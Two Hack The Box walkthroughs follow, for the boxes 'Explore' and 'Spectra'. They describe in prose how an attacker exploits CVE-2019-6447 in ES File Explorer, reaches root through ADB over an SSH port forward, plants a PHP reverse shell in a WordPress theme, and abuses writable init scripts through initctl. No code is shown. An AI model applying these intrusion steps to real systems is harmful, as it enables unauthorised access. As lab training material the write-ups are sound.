Hack The Box – Explore

 

 

Target IP: 10.10.10.247
Box: https://app.hackthebox.eu/machines/Spectra

First we run Nmap to detect open ports. As shown in figure one, we are only able to detect two ports with a common “top 1000 ports” scan. One of them being SSH and one of them, which we are most likely not able to identify correct, is actively being filtered.

1. Nmap results for most common 1000 ports.

 

To make sure 2222 is a normal SSH and not something we identified incorrectly, we pull the banner by performing a script scan.

2. Script and Version scan for port 2222.

 

The SSH banner says Banana Studio. Since this is quite uncommon we look for more information on this. A quick Google search tells us, that this is an Android application.

Since we only have port 2222 to access, we run another Nmap scan with the option -p- to identify all open ports of that system.

And indeed we find two more ports on which we run script and version scans against afterwards. Doing so reveals one especially odd looking port.

3. Nmap identified another open port which looks quite uncommon.

 

Port 59777 says its a httpd for a Minecraft game server. When we use Google to search for  “port 59777” we find that this port is most often used for an ES File Explorer application which is specially used by Android systems. This would make sense since we already saw that the SSH application is from an Android build.

Furthermore Google points us directly at a vulnerability for this service CVE-2019-6447 . Taking a quick look at exploit-db we find an exploit for this.

We download the exploit and run it against the target system. The exploit code seems to work and allows us to list and download files off the target.
We quickly identify something interesting called creds.jpg.

4. Exploiting CVE-2019-6447 to list and download files.

We download the file and take a look at it. The image contains credentials for an user called Kristi as shown in figure 5.

5. Content for creds.jpg

We use these credentials with SSH on port 2222 and we are in. After taking a quick look at the box we remember that there was a port at the beginning that was actively filtered. Lets take a look at it!

6. Checking ports on the system to find port 5555 locally listening.

We use Google one more time to search for “android port 5555”. Doing so gives us an article that is about ADB – Android Debug Bridge.

“For the ones not aware of what is ADB, try to think of it as the shell for Android devices, that lets anyone execute commands and install whatsoever they want, thus allowing them to take full control of the device without the need to authenticate. “

Sound pretty much like the thing we are looking for. We install ADB on our attacking Linux machine.

We then create a port forward over SSH from the victim machine to our attacking machine of port 5555. We are then able to use ADB to connect to port 5555 on our attacking localhost machine and access the ADB service of the remote system.

As shown in figure 7, this grants us root access.

7. Creating a port forward over SSH (top) and using ADB to get root access (bottom).

 

 

 

Hack The Box – Spectra

 

Target IP: 10.10.10.229
Attacker IP: 10.10.14.84
Box: https://app.hackthebox.eu/machines/Spectra

First we start with a Nmap scan as usual. Figure 1 shows that SSH, as well as HTTP  and SQL are available.

1. Nmap scan of target system

First we check the web service on port 80 by browsing the website.

2. Browsing the web service on port 80

From here there are two destinations we can go to, but both redirect to the DNS spectre.htb which is  why we need to edit our local hosts file first, if we do not want to replace the name with the IP address for every single webpage we visit.

The first site “software issue tracker” goes to a WordPress site as shown in figure 3.

3. WordPress site on target

Here find find nothing special – but see a username of one of the WordPress authors called administrator. In the background we can start a wp-scan but we wont find anything useful.

The second website labeled “Test” shows an error message of a DB connection.

4. DB connection error after following the “Test” link

 

By editing the path and browsing the /testing/ directory we can see a directory listing of a WordPress installation.

5. Open directory listing

This is interesting since it contains the wp-config.php file, which if we try to reach it we get the same database error as in figure 4.
But if we go and open the wp-config.php.save file we are getting a blank page.
Displaying the page source code shows the PHP code of that file, which contains the WordPress DB credentials.

6. Credentials to the WordPress database

We are not allowed to make any connections directly to the database itself – but due to credential reuse we are able to connect to the WordPress backend with the previously found username administrator and the password devteam01.

Inside the backend we can open the “Theme Editor” tab and we are able to edit any WordPress theme site and sneak in some reverse shell code. For example the 404 template page for theme twenty seventeen as shown in figure 7.

7. Injection a PHP reverse shell inside a WordPress template

By browsing the template located at http://spectra.htb/main/wp-content/themes/twentyseventeen/404.php we are able to trigger the execution of the PHP code to get shell access to the system.

8. Reverse shell connection back to our machine

The target machine is running Chromium OS – most likely being a ChromeBook.

9. Discovering the host OS

Digging through the machine we find something interesting called autologin inside the /etc/ directory. Inside /etc/autologin/passwd we find a password
which seems to belong to a user account.

10. Finding user credentials

We enumerate the users of the system by taking a look inside the /etc/passwd file and then try to connect to the system over SSH.

After connecting to the target system as user Katie we see that we are able to execute a program called initctl without providing the root password.

11. Sudo options of user Katie

Initctl runs jobs that consist of configuration scripts. Inside the /etc/init/ directory we find that there are some scripts that we are able to edit – since Katie is a member of the developers group as shown in figure 12.

12. Permissions of init scripts

Now, that we are able to edit the content of the test scripts, we place our reverse shell code inside one of the scripts and then use initctl to execute the script as root to receive privileged access to the machine.

13. Placing shell code (top) and executing it (bottom left) grants us privileged access (bottom right)